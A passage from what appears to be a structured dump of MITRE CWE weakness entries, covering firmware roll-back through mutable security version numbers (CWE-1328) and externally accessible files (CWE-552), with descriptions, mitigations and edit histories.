"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated References, Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
},
{
"Description": "Appropriate Post-Si tests should be carried out to ensure that residual confidential information is not left on parts leaving one facility for another facility.",
"DetectionMethodID": null,
"Effectiveness": "Moderate",
"EffectivenessNotes": null,
"Method": "Dynamic Analysis with Manual Results Interpretation"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "The following example shows how an attacker can take advantage of a piece of confidential information that has not been protected from the OSAT.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Suppose the preproduction device contains NVM (a storage medium that by definition/design can retain its data without power), and this NVM contains a key that can unlock all the parts for that generation. An OSAT facility accidentally leaks the key.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "Compromising a key that can unlock all the parts of a generation can be devastating to a chipmaker.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The likelihood of such a compromise can be reduced by ensuring all memories on the preproduction device are properly scrubbed.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"285",
"1297"
]
] |
[] |
1328
|
Security Version Number Mutable to Older Versions
|
Base
|
Simple
|
Draft
|
Security-version number in hardware is mutable, resulting in the ability to downgrade (roll-back) the boot firmware to vulnerable code versions.
|
A System-on-Chip (SoC) implements secure boot or verified boot. It might support a security version number, which prevents downgrading the current firmware to a vulnerable version. Once downgraded to a previous version, an adversary can launch exploits on the SoC and thus compromise the security of the SoC. These downgrade attacks are also referred to as roll-back attacks.
The security version number must be stored securely and persistently across power-on resets. A common weakness is that the security version number is modifiable by an adversary, allowing roll-back or downgrade attacks or, under certain circumstances, preventing upgrades (i.e. Denial-of-Service on upgrades). In both cases, the SoC is in a vulnerable state.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not OS-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Operating_System"
},
{
"Class": "Not Architecture-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Architecture"
},
{
"Class": null,
"Name": "Security Hardware",
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "Such issues could be introduced during hardware architecture and design, and can be identified later during testing or system configuration phases.",
"Phase": "Implementation"
}
] |
[
{
"Impact": [
"Other"
],
"Likelihood": [
"High"
],
"Note": "Impact includes roll-back or downgrade to a vulnerable version of the firmware or DoS (prevent upgrades).",
"Scope": [
"Confidentiality",
"Integrity",
"Authentication",
"Authorization"
]
}
] |
[
{
"Description": "When architecting the system, security version data should be designated for storage in registers that are either read-only or have access controls that prevent modification by an untrusted agent.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Architecture and Design"
],
"Strategy": null
},
{
"Description": "During implementation and test, security version data should be demonstrated to be read-only and access controls should be validated.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation"
],
"Strategy": null
}
] | null | null | null |
[
"176"
] | null | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": "2020-04-25",
"SubmissionName": "Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna",
"SubmissionOrganization": "Intel Corporation",
"SubmissionReleaseDate": "2020-12-10",
"SubmissionVersion": "4.3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2021-07-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Demonstrative_Examples",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-04-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms",
"ModificationDate": "2022-06-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "285",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "757",
"Nature": "PeerOf",
"Ordinal": "Primary",
"ViewID": "1000"
}
] | null |
[
{
"Description": "Mutability of stored security version numbers and programming with older firmware images should be part of automated testing.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Automated Dynamic Analysis"
},
{
"Description": "Anti-roll-back features should be reviewed as part of Architecture or Design review.",
"DetectionMethodID": null,
"Effectiveness": "High",
"EffectivenessNotes": null,
"Method": "Architecture or Design Review"
}
] |
[
{
"Entries": [
{
"BodyText": null,
"ExampleCode": null,
"IntroText": "A new version of firmware is signed with a security version number higher than the previous version. During the firmware update process the SoC checks for the security version number and upgrades the SoC firmware with the latest version. This security version number is stored in persistent memory upon successful upgrade for use across power-on resets.",
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "In general, if the security version number is mutable, the implementation is vulnerable. A mutable security version number allows an adversary to change the security version to a lower value to allow roll-back or to a higher value to prevent future upgrades.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
},
{
"BodyText": "The security version number should be stored in immutable hardware such as fuses, and the writes to these fuses should be highly access-controlled with appropriate authentication and authorization protections.",
"ExampleCode": null,
"IntroText": null,
"Language": null,
"Nature": null,
"Reference": null
}
],
"ID": null
}
] | null | null | null | null | 1
|
[
[
"284",
"285",
"1328"
]
] |
[] |
552
|
Files or Directories Accessible to External Parties
|
Base
|
Simple
|
Draft
|
The product makes files or directories accessible to unauthorized actors, even though they should not be.
|
Web servers, FTP servers, and similar servers may store a set of files underneath a "root" directory that is accessible to the server's users. Applications may store sensitive files underneath this root without also using access control to limit which users may request those files, if any. Alternately, an application might package multiple files or directories into an archive file (e.g., ZIP or tar), but the application might not exclude sensitive files that are underneath those directories.
In cloud technologies and containers, this weakness might present itself in the form of misconfigured storage accounts that can be read or written by a public or anonymous user.
|
[
{
"Class": "Not Language-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Language"
},
{
"Class": "Not Technology-Specific",
"Name": null,
"Prevalence": "Undetermined",
"Type": "Technology"
},
{
"Class": "Cloud Computing",
"Name": null,
"Prevalence": "Often",
"Type": "Technology"
}
] | null |
[
{
"Note": null,
"Phase": "Architecture and Design"
},
{
"Note": "OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.",
"Phase": "Implementation"
},
{
"Note": "OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase.",
"Phase": "Operation"
}
] |
[
{
"Impact": [
"Read Files or Directories",
"Modify Files or Directories"
],
"Likelihood": null,
"Note": null,
"Scope": [
"Confidentiality",
"Integrity"
]
}
] |
[
{
"Description": "When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access.",
"Effectiveness": null,
"EffectivenessNotes": null,
"MitigationID": null,
"Phase": [
"Implementation",
"System Configuration",
"Operation"
],
"Strategy": null
}
] |
[
{
"Description": "Data file under web root.",
"Link": "https://www.cve.org/CVERecord?id=CVE-2005-1835",
"Reference": "CVE-2005-1835"
}
] |
[
"File or Directory"
] |
[
{
"EntryID": "A10",
"EntryName": "Insecure Configuration Management",
"MappingFit": "CWE More Specific",
"TaxonomyName": "OWASP Top Ten 2004"
},
{
"EntryID": "FIO15-C",
"EntryName": "Ensure that file operations are performed in a secure directory",
"MappingFit": null,
"TaxonomyName": "CERT C Secure Coding"
}
] |
[
"150",
"639"
] |
[
{
"Authors": [
"Center for Internet Security"
],
"Edition": null,
"ExternalReferenceID": "REF-1307",
"Publication": null,
"PublicationDay": "16",
"PublicationMonth": "08",
"PublicationYear": "2022",
"Publisher": null,
"Section": "Section 3.7",
"Title": "CIS Microsoft Azure Foundations Benchmark version 1.5.0",
"URL": "https://www.cisecurity.org/benchmark/azure",
"URLDate": "2023-01-19"
},
{
"Authors": [
"Center for Internet Security"
],
"Edition": null,
"ExternalReferenceID": "REF-1327",
"Publication": null,
"PublicationDay": "31",
"PublicationMonth": "03",
"PublicationYear": "2022",
"Publisher": null,
"Section": "Section 5.1",
"Title": "CIS Google Cloud Computing Platform Benchmark version 1.3.0",
"URL": "https://www.cisecurity.org/benchmark/google_cloud_computing_platform",
"URLDate": "2023-04-24"
}
] | null |
[
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": "Submitted by members of the CWE community to extend early CWE versions",
"SubmissionDate": "2006-07-19",
"SubmissionName": "CWE Community",
"SubmissionOrganization": null,
"SubmissionReleaseDate": "2006-07-19",
"SubmissionVersion": "Draft 3",
"Type": "Submission",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Time_of_Introduction",
"ModificationDate": "2008-07-01",
"ModificationName": "Eric Dalci",
"ModificationOrganization": "Cigital",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Suggested OWASP Top Ten 2004 mapping",
"ModificationDate": "2008-08-15",
"ModificationName": null,
"ModificationOrganization": "Veracode",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-09-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2008-11-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2009-07-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "Suggested OWASP Top Ten mapping",
"ModificationDate": "2010-09-09",
"ModificationName": null,
"ModificationOrganization": "Veracode",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2010-09-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Common_Consequences",
"ModificationDate": "2011-06-01",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships, Taxonomy_Mappings",
"ModificationDate": "2011-09-13",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2012-05-11",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2014-07-30",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2015-12-07",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2017-01-19",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Affected_Resources, Modes_of_Introduction, Relationships, Taxonomy_Mappings",
"ModificationDate": "2017-11-08",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2019-01-03",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2019-06-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Description, Relationships",
"ModificationDate": "2020-02-24",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Related_Attack_Patterns",
"ModificationDate": "2020-08-20",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Relationships",
"ModificationDate": "2021-10-28",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References",
"ModificationDate": "2023-01-31",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Applicable_Platforms, Demonstrative_Examples, Description, Detection_Factors, References, Relationships, Time_of_Introduction",
"ModificationDate": "2023-04-27",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Mapping_Notes",
"ModificationDate": "2023-06-29",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": null,
"ModificationComment": "updated Observed_Examples",
"ModificationDate": "2023-10-26",
"ModificationName": "CWE Content Team",
"ModificationOrganization": "MITRE",
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": null,
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Modification",
"Version": null
},
{
"ContributionComment": null,
"ContributionDate": null,
"ContributionName": null,
"ContributionOrganization": null,
"ContributionReleaseDate": null,
"ContributionType": null,
"ContributionVersion": null,
"Date": "2008-04-11",
"ModificationComment": null,
"ModificationDate": null,
"ModificationName": null,
"ModificationOrganization": null,
"ModificationReleaseDate": null,
"ModificationVersion": null,
"PreviousEntryName": "Errant Files or Directories Accessible",
"SubmissionComment": null,
"SubmissionDate": null,
"SubmissionName": null,
"SubmissionOrganization": null,
"SubmissionReleaseDate": null,
"SubmissionVersion": null,
"Type": "Rename",
"Version": null
}
] |
Allowed
|
This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities.
|
Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction.
|
[
"Acceptable-Use"
] | null |
[
{
"CweID": "668",
"Nature": "ChildOf",
"Ordinal": "Primary",
"ViewID": "1000"
},
{
"CweID": "285",
"Nature": "ChildOf",
